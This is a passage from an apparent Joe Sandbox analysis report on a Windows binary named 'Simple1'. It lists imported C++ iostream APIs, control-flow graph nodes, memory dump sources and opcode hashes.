              • ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140 ref: 00007FF7CEA9166D
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF7CEA9169B
              • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA91782
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA9178C
                • Part of subcall function 00007FF7CEA99820: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CEA9986D
                • Part of subcall function 00007FF7CEA99820: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CEA9988D
                • Part of subcall function 00007FF7CEA99820: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CEA9989D
                • Part of subcall function 00007FF7CEA99820: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7CEA998FD
                • Part of subcall function 00007FF7CEA99820: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7CEA99926
                • Part of subcall function 00007FF7CEA99820: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7CEA9995D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$?sputc@?$basic_streambuf@$??6?$basic_ostream@?good@ios_base@std@@V01@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@?flush@?$basic_ostream@_?setw@std@@D@std@@@1@_J@1@_Smanip@_U?$_U?$char_traits@_V12@V21@@V?$basic_streambuf@Vios_base@1@W@std@@@std@@isalnum
              • String ID: _$~
              • API String ID: 2365617078-3740536066
              • Opcode ID: 8f68b8c8258da5cd91e34a757c6f19a2daf3b84494c5e989e5e3b3f3a5cd17a5
              • Instruction ID: 497da175a7bb1cc7c5c8b35de7f5c3d4b6ffb06bcde11dc856194a6125a2eb95
              • Opcode Fuzzy Hash: 8f68b8c8258da5cd91e34a757c6f19a2daf3b84494c5e989e5e3b3f3a5cd17a5
              • Instruction Fuzzy Hash: 4971B332A18A8189EB10DF55E8806BEF7A0FB94BA8F848135DA4D63769DF7CD445C710

              Control-flow Graph

              APIs
              • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CEA91881), ref: 00007FF7CEA98A20
              • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CEA98A3F
              • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA98A71
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CEA98A8C
              • ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF7CEA98AB6
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CEA98AD3
              • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7CEA98AFA
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAPEAD0PEAH001@Z.MSVCP140 ref: 00007FF7CEA98B21
              • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7CEA98B45
                • Part of subcall function 00007FF7CEA99FB0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF7CEA99FDD
                • Part of subcall function 00007FF7CEA99FB0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF7CEA99FF7
                • Part of subcall function 00007FF7CEA99FB0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF7CEA9A029
                • Part of subcall function 00007FF7CEA99FB0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF7CEA9A054
                • Part of subcall function 00007FF7CEA99FB0: std::_Facet_Register.LIBCPMT ref: 00007FF7CEA9A06D
                • Part of subcall function 00007FF7CEA99FB0: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF7CEA9A08C
              • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CEA98B5A
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CEA98B71
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CEA98BB0
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$Lockit@std@@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@_Bid@locale@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@H001@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@_U_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@W@std@@@std@@_get_stream_buffer_pointersstd::_
              • String ID:
              • API String ID: 3818078705-0
              • Opcode ID: f35c13acc3d87238f3b7b1e58bee0d7e5fa0656072ccc1d0c3963a8712f1ca8d
              • Instruction ID: 077d6e84a580a0ca5869af8c6c50c6a73449e669d0f413f76bce96a2ac9fef5a
              • Opcode Fuzzy Hash: f35c13acc3d87238f3b7b1e58bee0d7e5fa0656072ccc1d0c3963a8712f1ca8d
              • Instruction Fuzzy Hash: 66514732608B859AEB049F25E950B7DB7A0FB89BA4F948035DB8D13B24DF3CE065C750

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$EnumProcessmemset$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@BaseCloseD@std@@@1@@HandleModuleModulesNameOpenProcessesV?$basic_streambuf@memcpy
              • String ID:
              • API String ID: 3444793848-0
              • Opcode ID: 176818b9055dcd18f90ea10054250413a06e4f11656990404fb4c7ffa63b3a2d
              • Instruction ID: 51c69cb8d1267a8570f36215b5e0ed7fd81c6726a6d5ea4a05e4be82b5639d97
              • Opcode Fuzzy Hash: 176818b9055dcd18f90ea10054250413a06e4f11656990404fb4c7ffa63b3a2d
              • Instruction Fuzzy Hash: 17719232A18B858AEB20DF65D8806BDB3A1FB85B94F808132DE8D67B59DF3CD545C710

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1232 7ff7cea99c10-7ff7cea99c3f 1233 7ff7cea99c40-7ff7cea99c48 1232->1233 1233->1233 1234 7ff7cea99c4a-7ff7cea99c59 1233->1234 1235 7ff7cea99c65 1234->1235 1236 7ff7cea99c5b-7ff7cea99c5e 1234->1236 1238 7ff7cea99c67-7ff7cea99c77 1235->1238 1236->1235 1237 7ff7cea99c60-7ff7cea99c63 1236->1237 1237->1238 1239 7ff7cea99c80-7ff7cea99c92 ?good@ios_base@std@@QEBA_NXZ 1238->1239 1240 7ff7cea99c79-7ff7cea99c7f 1238->1240 1241 7ff7cea99cc4-7ff7cea99cca 1239->1241 1242 7ff7cea99c94-7ff7cea99ca3 1239->1242 1240->1239 1246 7ff7cea99cd6-7ff7cea99cef 1241->1246 1247 7ff7cea99ccc-7ff7cea99cd1 1241->1247 1244 7ff7cea99cc2 1242->1244 1245 7ff7cea99ca5-7ff7cea99ca8 1242->1245 1244->1241 1245->1244 1248 7ff7cea99caa-7ff7cea99cc0 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1245->1248 1250 7ff7cea99d1f-7ff7cea99d3a ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1246->1250 1251 7ff7cea99cf1-7ff7cea99cf4 1246->1251 1249 7ff7cea99d8e-7ff7cea99dac ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1247->1249 1248->1241 1252 7ff7cea99db8-7ff7cea99dc8 1249->1252 1253 7ff7cea99dae-7ff7cea99db7 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1249->1253 1255 7ff7cea99d67 1250->1255 1256 7ff7cea99d3c 1250->1256 1251->1250 1254 7ff7cea99cf6-7ff7cea99d11 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1251->1254 1258 7ff7cea99dd1-7ff7cea99deb 1252->1258 1259 7ff7cea99dca-7ff7cea99dd0 1252->1259 1253->1252 1260 7ff7cea99d13-7ff7cea99d18 1254->1260 1261 7ff7cea99d1a-7ff7cea99d1d 1254->1261 1257 7ff7cea99d6a 1255->1257 1262 7ff7cea99d40-7ff7cea99d43 1256->1262 1264 7ff7cea99d6e-7ff7cea99d7e 1257->1264 1259->1258 1260->1257 1261->1251 1263 7ff7cea99d45-7ff7cea99d60 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1262->1263 1262->1264 1263->1255 1265 7ff7cea99d62-7ff7cea99d65 1263->1265 1264->1249 1265->1262
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CEA99C8A
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CEA99CAA
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CEA99CBA
              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CEA99D07
              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF7CEA99D31
              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CEA99D56
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CEA99D9D
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CEA99DA4
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CEA99DB1
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@_U?$char_traits@V12@
              • String ID:
              • API String ID: 3397294066-0
              • Opcode ID: 9340df2d7b22759f6c791cb39ea6ec1440f113354fa38e5be513034bf6c266e4
              • Instruction ID: 0663fc8664dbf04118fc582fede38c0b69b6ac3da5445bb44893aa609eb456d9
              • Opcode Fuzzy Hash: 9340df2d7b22759f6c791cb39ea6ec1440f113354fa38e5be513034bf6c266e4
              • Instruction Fuzzy Hash: 40514032608A4199EF219F1AD9C0A3DEBA0FF84FA5B55D531CE4E537A1CF39D4428314

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1267 7ff7cea999f0-7ff7cea99a19 1268 7ff7cea99a20-7ff7cea99a27 1267->1268 1268->1268 1269 7ff7cea99a29-7ff7cea99a38 1268->1269 1270 7ff7cea99a44 1269->1270 1271 7ff7cea99a3a-7ff7cea99a3d 1269->1271 1273 7ff7cea99a46-7ff7cea99a56 1270->1273 1271->1270 1272 7ff7cea99a3f-7ff7cea99a42 1271->1272 1272->1273 1274 7ff7cea99a5f-7ff7cea99a71 ?good@ios_base@std@@QEBA_NXZ 1273->1274 1275 7ff7cea99a58-7ff7cea99a5e 1273->1275 1276 7ff7cea99aa3-7ff7cea99aa9 1274->1276 1277 7ff7cea99a73-7ff7cea99a82 1274->1277 1275->1274 1281 7ff7cea99ab5-7ff7cea99ac8 1276->1281 1282 7ff7cea99aab-7ff7cea99ab0 1276->1282 1279 7ff7cea99aa1 1277->1279 1280 7ff7cea99a84-7ff7cea99a87 1277->1280 1279->1276 1280->1279 1283 7ff7cea99a89-7ff7cea99a9f ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1280->1283 1285 7ff7cea99aca 1281->1285 1286 7ff7cea99afd-7ff7cea99b18 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1281->1286 1284 7ff7cea99b6d-7ff7cea99b8b ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1282->1284 1283->1276 1287 7ff7cea99b97-7ff7cea99ba7 1284->1287 1288 7ff7cea99b8d-7ff7cea99b96 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1284->1288 1289 7ff7cea99ad0-7ff7cea99ad3 1285->1289 1290 7ff7cea99b46 1286->1290 1291 7ff7cea99b1a 1286->1291 1294 7ff7cea99bb0-7ff7cea99bc4 1287->1294 1295 7ff7cea99ba9-7ff7cea99baf 1287->1295 1288->1287 1289->1286 1296 7ff7cea99ad5-7ff7cea99aef ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1289->1296 1293 7ff7cea99b49 1290->1293 1292 7ff7cea99b20-7ff7cea99b23 1291->1292 1297 7ff7cea99b25-7ff7cea99b3f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1292->1297 1298 7ff7cea99b4d-7ff7cea99b5d 1292->1298 1293->1298 1295->1294 1299 7ff7cea99af1-7ff7cea99af6 1296->1299 1300 7ff7cea99af8-7ff7cea99afb 1296->1300 1297->1290 1301 7ff7cea99b41-7ff7cea99b44 1297->1301 1298->1284 1299->1293 1300->1289 1301->1292
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A69
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A89
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A99
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99AE6
              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B0F
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B36
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B7C
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B83
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B90
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
              • String ID:
              • API String ID: 1135186806-0
              • Opcode ID: 5814e694fa5f361751dc898f9d5e21bc3f4dd92118ae153b6ae81dfab933b90a
              • Instruction ID: 9f7e7aed5efa021b5c3aba3dc6f6ea47b7970ef99f6658096d941fa7434854b5
              • Opcode Fuzzy Hash: 5814e694fa5f361751dc898f9d5e21bc3f4dd92118ae153b6ae81dfab933b90a
              • Instruction Fuzzy Hash: CF516F32609A4196EB20AF1AE89063CE7A0FF84FA1B95D531CA5E57BA1CF3DD4428314

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1303 7ff7cea9b080-7ff7cea9b0ba 1304 7ff7cea9b0c6 1303->1304 1305 7ff7cea9b0bc-7ff7cea9b0bf 1303->1305 1306 7ff7cea9b0c8-7ff7cea9b0d8 1304->1306 1305->1304 1307 7ff7cea9b0c1-7ff7cea9b0c4 1305->1307 1308 7ff7cea9b0e1-7ff7cea9b0f3 ?good@ios_base@std@@QEBA_NXZ 1306->1308 1309 7ff7cea9b0da-7ff7cea9b0e0 1306->1309 1307->1306 1310 7ff7cea9b125-7ff7cea9b12b 1308->1310 1311 7ff7cea9b0f5-7ff7cea9b104 1308->1311 1309->1308 1315 7ff7cea9b137-7ff7cea9b150 1310->1315 1316 7ff7cea9b12d-7ff7cea9b132 1310->1316 1313 7ff7cea9b123 1311->1313 1314 7ff7cea9b106-7ff7cea9b109 1311->1314 1313->1310 1314->1313 1317 7ff7cea9b10b-7ff7cea9b121 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1314->1317 1319 7ff7cea9b152-7ff7cea9b155 1315->1319 1320 7ff7cea9b184-7ff7cea9b19f ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1315->1320 1318 7ff7cea9b1ef-7ff7cea9b20d ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1316->1318 1317->1310 1323 7ff7cea9b20f-7ff7cea9b218 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1318->1323 1324 7ff7cea9b219-7ff7cea9b228 1318->1324 1319->1320 1325 7ff7cea9b157-7ff7cea9b172 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1319->1325 1321 7ff7cea9b1a1-7ff7cea9b1a4 1320->1321 1322 7ff7cea9b1c8-7ff7cea9b1cb 1320->1322 1326 7ff7cea9b1cf-7ff7cea9b1df 1321->1326 1327 7ff7cea9b1a6-7ff7cea9b1c1 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1321->1327 1322->1326 1323->1324 1328 7ff7cea9b231-7ff7cea9b24b 1324->1328 1329 7ff7cea9b22a-7ff7cea9b230 1324->1329 1330 7ff7cea9b17f-7ff7cea9b182 1325->1330 1331 7ff7cea9b174-7ff7cea9b17d 1325->1331 1326->1318 1327->1322 1332 7ff7cea9b1c3-7ff7cea9b1c6 1327->1332 1329->1328 1330->1319 1331->1321 1332->1321
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CEA91AD2), ref: 00007FF7CEA9B0EB
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CEA91AD2), ref: 00007FF7CEA9B10B
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CEA91AD2), ref: 00007FF7CEA9B11B
              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CEA91AD2), ref: 00007FF7CEA9B168
              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CEA91AD2), ref: 00007FF7CEA9B196
              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CEA91AD2), ref: 00007FF7CEA9B1B7
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CEA91AD2), ref: 00007FF7CEA9B1FE
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CEA91AD2), ref: 00007FF7CEA9B205
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CEA91AD2), ref: 00007FF7CEA9B212
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@_U?$char_traits@V12@
              • String ID:
              • API String ID: 3397294066-0
              • Opcode ID: d4daf986c591b3d0968fda3093ef46c4df527e5844f88b62d69c232397f5e4b9
              • Instruction ID: 05f22a3fd70c5a985c2fc6422fdd309efcd28445d352338ff650461b42ddb0ad
              • Opcode Fuzzy Hash: d4daf986c591b3d0968fda3093ef46c4df527e5844f88b62d69c232397f5e4b9
              • Instruction Fuzzy Hash: 62511F32618A4189EB209F19E984A3DE7A0FF94FA5BA5C432CE4E57761CF3DD446C314
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CEA9986D
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CEA9988D
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CEA9989D
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7CEA998FD
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7CEA99926
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7CEA9995D
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CEA999A1
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CEA999A8
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CEA999B5
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: ?sputc@?$basic_streambuf@D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
              • String ID:
              • API String ID: 569342377-0
              • Opcode ID: 37b8ee53cb8b00479985113fba4434682f5c23c40aa0f0a0174690d29aea351c
              • Instruction ID: f966bb64c2c7c971699fae82dc5724dbcae9e4e379b6527a94603b52e08286a8
              • Opcode Fuzzy Hash: 37b8ee53cb8b00479985113fba4434682f5c23c40aa0f0a0174690d29aea351c
              • Instruction Fuzzy Hash: 6E519132609A819AEF109F19D9D063CA7A0FF84FA5B54C536CE5E577A0CF39C456C310
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
